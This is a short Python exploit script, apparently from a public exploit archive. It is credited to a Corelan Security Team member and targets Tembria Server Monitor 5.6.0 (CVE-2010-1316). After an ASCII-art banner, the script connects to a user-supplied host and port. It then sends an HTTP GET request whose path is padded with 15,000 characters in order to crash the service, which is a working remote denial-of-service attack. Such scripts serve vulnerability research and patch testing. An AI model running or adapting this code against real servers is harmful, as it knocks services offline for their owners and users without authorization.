1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 |
#!/usr/bin/python # Exploit Title : Tembria Server Monitor 5.6.0 # CVE-ID: CVE-2010-1316 # Date: April 9, 2010 # Author: Lincoln # Software Link : http://www.tembria.com/ # Version : 5.6.0 # OS: Windows # Tested on : XP SP3 En (VirtualBox) # Type of vuln: Remote DoS # Greetz to : Corelan Security Team # http://www.corelan.be:8800/index.php/security/corelan-team-members/ # # Script provided 'as is', without any warranty. # Use for educational purposes only. # Do not use this code to do anything illegal ! # # Note : you are not allowed to edit/modify this code. # If you do, Corelan cannot be held responsible for any damages this may cause. # # print "|------------------------------------------------------------------|" print "| __ __|" print "| _________________/ /___ _____ / /________ _____ ___|" print "|/ ___/ __ \/ ___/ _ \/ / __ <code>/ __ \ / __/ _ \/ __ </code>/ __ `__ \ |" print "| / /__/ /_/ / //__/ / /_/ / / / // /_/__/ /_/ / / / / / / |" print "| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/|" print "||" print "| http://www.corelan.be:8800 |" print "||" print "||" print "|-------------------------------------------------[ EIP Hunters ]--|" print "\n[+] Exploit for Tembria Server Monitor 5.6.0" import socket,sys #usage ./filename.py IP PORT host = sys.argv[1] port = int(sys.argv[2]) #80 buf = "GET /tembria/index.asp/"+ "B" * 15000+ " A" + " HTTP/1.1\r\n\r\n" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) print "[+] DoS packet sent!\n" s.send(buf) s.close() |